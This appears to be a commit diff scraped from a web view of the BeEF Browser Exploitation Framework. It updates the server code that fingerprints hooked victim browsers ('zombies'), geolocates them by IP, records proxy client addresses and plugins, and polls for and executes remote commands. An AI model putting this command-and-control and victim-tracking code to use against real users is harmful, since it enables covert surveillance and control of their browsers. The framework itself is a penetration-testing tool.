// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,
is not called at all (always in cross-origin situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).

13
core/main/client/updater.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -15,6 +15,7 @@ beef.updater = {
// XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock.
lock: false,
@@ -46,9 +47,8 @@ beef.updater = {
this.get_commands(); /*Polling*/
}
}
// ( typeof beef.websocket === "undefined")
setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
/* The following gives a stupid syntax error in IE, which can be ignored*/
setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
},
/**
@@ -57,7 +57,7 @@ beef.updater = {
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});
@@ -80,6 +80,9 @@ beef.updater = {
command();
} catch(e) {
console.error('execute_commands - command failed to execute: ' + e.message);
// prints the command source to be executed, to better trace errors
// beef.client_debug must be enabled in the main config
beef.debug(command.toString());
}
}
this.lock = false;

4
core/main/client/websocket.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -20,7 +20,7 @@ beef.websocket = {
/**
* Initialize the WebSocket client object.
* Note: use WebSocketSecure only if the hooked domain is under https.
* Note: use WebSocketSecure only if the hooked origin is under https.
* Mixed-content in WS is quite different from a non-WS context.
*/
init:function () {

2
core/main/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/main/configuration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -22,14 +22,14 @@ module BeEF
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(config)
raise Exception::TypeError, '"config" needs to be a string' if not config.string?
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
raise Exception::TypeError, "Configuration file '#{config}' cannot be found" if not File.exist?(config)
begin
#open base config
@config = self.load(config)
# set default value if key? does not exist
@config.default = nil
@@config = config
rescue Exception => e
rescue => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
@@ -44,7 +44,7 @@ module BeEF
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
rescue => e
print_debug "Unable to load '#{file}' #{e}"
return nil
end

4
core/main/console/banners.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -86,7 +86,7 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
print_more data
end

2
core/main/console/commandline.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

112
core/main/constants/browsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -7,75 +7,75 @@
module BeEF
module Core
module Constants
module Browsers
FF = 'FF' # Firefox
M = 'M' # Mozila
IE = 'IE' # Internet Explorer
S = 'S' # Safari
K = 'K' # Konqueror
C = 'C' # Chrome
FF = 'FF' # Firefox
M = 'M' # Mozilla
IE = 'IE' # Internet Explorer
S = 'S' # Safari
K = 'K' # Konqueror
C = 'C' # Chrome
O = 'O' # Opera
ALL = 'ALL' # ALL
UNKNOWN = 'UN' # Unknown
FRIENDLY_FF_NAME = 'Firefox'
FRIENDLY_M_NAME = 'Mozila'
FRIENDLY_IE_NAME = 'Internet Explorer'
FRIENDLY_S_NAME = 'Safari'
FRIENDLY_K_NAME = 'Konqueror'
FRIENDLY_C_NAME = 'Chrome'
ALL = 'ALL' # ALL
UNKNOWN = 'UN' # Unknown
FRIENDLY_FF_NAME = 'Firefox'
FRIENDLY_M_NAME = 'Mozilla'
FRIENDLY_IE_NAME = 'Internet Explorer'
FRIENDLY_S_NAME = 'Safari'
FRIENDLY_K_NAME = 'Konqueror'
FRIENDLY_C_NAME = 'Chrome'
FRIENDLY_O_NAME = 'Opera'
FRIENDLY_UN_NAME = "UNKNOWN"
# Attempt to retrieve a browsers friendly name
FRIENDLY_UN_NAME = 'UNKNOWN'
# Attempt to retrieve a browser's friendly name
# @param [String] browser_name Short browser name
# @return [String] Friendly browser name
def self.friendly_name(browser_name)
case browser_name
when FF; return FRIENDLY_FF_NAME
when M; return FRIENDLY_M_NAME
when IE; return FRIENDLY_IE_NAME
when S; return FRIENDLY_S_NAME
when K; return FRIENDLY_K_NAME
when C; return FRIENDLY_C_NAME
when O; return FRIENDLY_O_NAME
def self.friendly_name(browser_name)
case browser_name
when FF; return FRIENDLY_FF_NAME
when M ; return FRIENDLY_M_NAME
when IE; return FRIENDLY_IE_NAME
when S ; return FRIENDLY_S_NAME
when K ; return FRIENDLY_K_NAME
when C ; return FRIENDLY_C_NAME
when O ; return FRIENDLY_O_NAME
when UNKNOWN; return FRIENDLY_UN_NAME
end
end
end
end
# Attempt to match the browserstring to a browser constant
# @param [String] browserstring Browser UA string
# @return [Array] An array of matching browser constants
# @todo Confirm this function returns an array if multiple constants are matched
def self.match_browser(browserstring)
matches = []
browserstring.split(" ").each do |chunk|
case chunk
when /Firefox/ , /FF/
matches << FF
when /Mozilla/
matches << M
when /Internet Explorer/, /IE/
matches << IE
when /Safari/
matches << S
when /Konqueror/
matches << K
when /Chrome/
matches << C
when /Opera/
matches << O
end
end
matches.uniq
end
def self.match_browser(browserstring)
matches = []
browserstring.split(" ").each do |chunk|
case chunk
when /Firefox/, /FF/
matches << FF
when /Mozilla/
matches << M
when /Internet Explorer/, /IE/
matches << IE
when /Safari/
matches << S
when /Konqueror/
matches << K
when /Chrome/
matches << C
when /Opera/
matches << O
end
end
matches.uniq
end
end
end
end
end

2
core/main/constants/commandmodule.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/constants/distributedengine.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

6
core/main/constants/hardware.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -34,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_GOOGLE_UA_STR = 'Nexus'
HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'

2
core/main/constants/os.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/crypto.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/distributed_engine/models/rules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

225
core/main/handlers/browserdetails.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -68,6 +68,7 @@ module BeEF
}
zombie.httpheaders = @http_headers.to_json
zombie.save
#print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,86 @@ module BeEF
self.err_msg "Invalid browser name returned from the hook browser's initial connection."
end
# geolocation
if config.get('beef.geoip.enable')
require 'geoip'
geoip_file = config.get('beef.geoip.database')
if File.exists? geoip_file
geoip = GeoIP.new(geoip_file).city(zombie.ip)
if geoip.nil?
print_debug "[INIT] Geolocation failed - No results for IP address '#{zombie.ip}'"
else
#print_debug "[INIT] Geolocation results: #{geoip}"
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
BD.set(session_id, 'LocationCity', "#{geoip['city_name']}")
BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}")
BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}")
BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}")
BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}")
BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}")
BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}")
BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}")
BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}")
BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}")
BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}")
end
else
print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
end
end
# detect browser proxy
using_proxy = false
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'PROXY_CONNECTION',
'PROXY_AUTHENTICATE',
'X_FORWARDED',
'X_FORWARDED_FOR',
'VIA'
].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true
break
end
end
# retrieve proxy client IP
proxy_clients = []
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'X_FORWARDED',
'X_FORWARDED_FOR'
].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end
# retrieve proxy server
proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
# store and log proxy details
if using_proxy == true
BD.set(session_id, 'UsingProxy', "#{using_proxy}")
proxy_log_string = "#{zombie.ip} is using a proxy"
unless proxy_clients.empty?
BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
end
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
# get and store browser version
browser_version = get_param(@data['results'], 'BrowserVersion')
if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -95,6 +176,10 @@ module BeEF
self.err_msg "Invalid browser string returned from the hook browser's initial connection."
end
# get and store browser language
browser_lang = get_param(@data['results'], 'BrowserLanguage')
BD.set(session_id, 'BrowserLanguage', browser_lang)
# get and store the cookies
cookies = get_param(@data['results'], 'Cookies')
if BeEF::Filters.is_valid_cookies?(cookies)
@@ -111,6 +196,10 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store default browser
default_browser = get_param(@data['results'], 'DefaultBrowser')
BD.set(session_id, 'DefaultBrowser', default_browser)
# get and store the hardware name
hw_name = get_param(@data['results'], 'Hardware')
if BeEF::Filters.is_valid_hwname?(hw_name)
@@ -199,113 +288,25 @@ module BeEF
self.err_msg "Invalid window size returned from the hook browser's initial connection."
end
# get and store the yes|no value for JavaEnabled
java_enabled = get_param(@data['results'], 'JavaEnabled')
if BeEF::Filters.is_valid_yes_no?(java_enabled)
BD.set(session_id, 'JavaEnabled', java_enabled)
else
self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for VBScriptEnabled
vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
if BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
BD.set(session_id, 'VBScriptEnabled', vbscript_enabled)
else
self.err_msg "Invalid value for VBScriptEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasFlash
has_flash = get_param(@data['results'], 'HasFlash')
if BeEF::Filters.is_valid_yes_no?(has_flash)
BD.set(session_id, 'HasFlash', has_flash)
else
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasPhonegap
has_phonegap = get_param(@data['results'], 'HasPhonegap')
if BeEF::Filters.is_valid_yes_no?(has_phonegap)
BD.set(session_id, 'HasPhonegap', has_phonegap)
else
self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)
BD.set(session_id, 'HasGoogleGears', has_googlegears)
else
self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasFoxit
has_foxit = get_param(@data['results'], 'HasFoxit')
if BeEF::Filters.is_valid_yes_no?(has_foxit)
BD.set(session_id, 'HasFoxit', has_foxit)
else
self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebSocket
has_web_socket = get_param(@data['results'], 'HasWebSocket')
if BeEF::Filters.is_valid_yes_no?(has_web_socket)
BD.set(session_id, 'HasWebSocket', has_web_socket)
else
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex)
BD.set(session_id, 'HasActiveX', has_activex)
else
self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasSilverlight
has_silverlight = get_param(@data['results'], 'HasSilverlight')
if BeEF::Filters.is_valid_yes_no?(has_silverlight)
BD.set(session_id, 'HasSilverlight', has_silverlight)
else
self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasQuickTime
has_quicktime = get_param(@data['results'], 'HasQuickTime')
if BeEF::Filters.is_valid_yes_no?(has_quicktime)
BD.set(session_id, 'HasQuickTime', has_quicktime)
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
BD.set(session_id, 'HasRealPlayer', has_realplayer)
else
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWMP
has_wmp = get_param(@data['results'], 'HasWMP')
if BeEF::Filters.is_valid_yes_no?(has_wmp)
BD.set(session_id, 'HasWMP', has_wmp)
else
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
# get and store the yes|no value for browser components
components = [
'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
'hasSessionCookies', 'hasPersistentCookies'
]
components.each do |k|
v = get_param(@data['results'], k)
if BeEF::Filters.is_valid_yes_no?(v)
BD.set(session_id, k, v)
else
self.err_msg "Invalid value for #{k} returned from the hook browser's initial connection."
end
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?
if BeEF::Filters.is_valid_cpu?(cpu_type)
BD.set(session_id, 'CPU', cpu_type)
else
self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
@@ -319,22 +320,6 @@ module BeEF
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# get and store whether the browser has session cookies enabled
has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
BD.set(session_id, 'hasSessionCookies', has_session_cookies)
else
self.err_msg "Invalid value for hasSessionCookies returned from the hook browser's initial connection."
end
# get and store whether the browser has persistent cookies enabled
has_persistent_cookies = get_param(@data['results'], 'hasPersistentCookies')
if BeEF::Filters.is_valid_yes_no?(has_persistent_cookies)
BD.set(session_id, 'hasPersistentCookies', has_persistent_cookies)
else
self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"

2
core/main/handlers/commands.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

9
core/main/handlers/hookedbrowsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -51,13 +51,18 @@ module Handlers
# @note is a known browser so send instructions
else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end
else

7
core/main/handlers/modules/beefjs.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -21,7 +21,7 @@ module BeEF
beef_js_path = "#{$root_dir}/core/main/client/"
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -80,8 +80,9 @@ module BeEF
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path
# @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?

5
core/main/handlers/modules/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -29,6 +29,7 @@ module BeEF
command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
else
key = BeEF::Module.get_key_by_database_id(command.command_module_id)
(print_error "Could not find command module with ID #{command.command_module_id}"; return) if key.nil?
command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
end
@@ -52,7 +53,7 @@ module BeEF
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
#content = command_module.output.gsub('//
#//
#// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
#// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
#// Browser Exploitation Framework (BeEF) - http://beefproject.com
#// See the file 'doc/COPYING' for copying permission
#//

5
core/main/logger.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -36,10 +36,9 @@ module Core
raise Exception::TypeError, '"from" needs to be a string' if not from.string?
raise Exception::TypeError, '"event" needs to be a string' if not event.string?
raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
# logging the new event into the database
@logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
print_debug "Event: #{event}"
# if notifications are enabled send the info there too
if @notifications
@notifications.new(from, event, time_now, hb)

2
core/main/migration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

4
core/main/models/browserdetails.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -80,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end

2
core/main/models/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/commandmodule.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/hookedbrowser.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/log.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/optioncache.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/result.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/models/user.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/network_stack/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/network_stack/assethandler.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
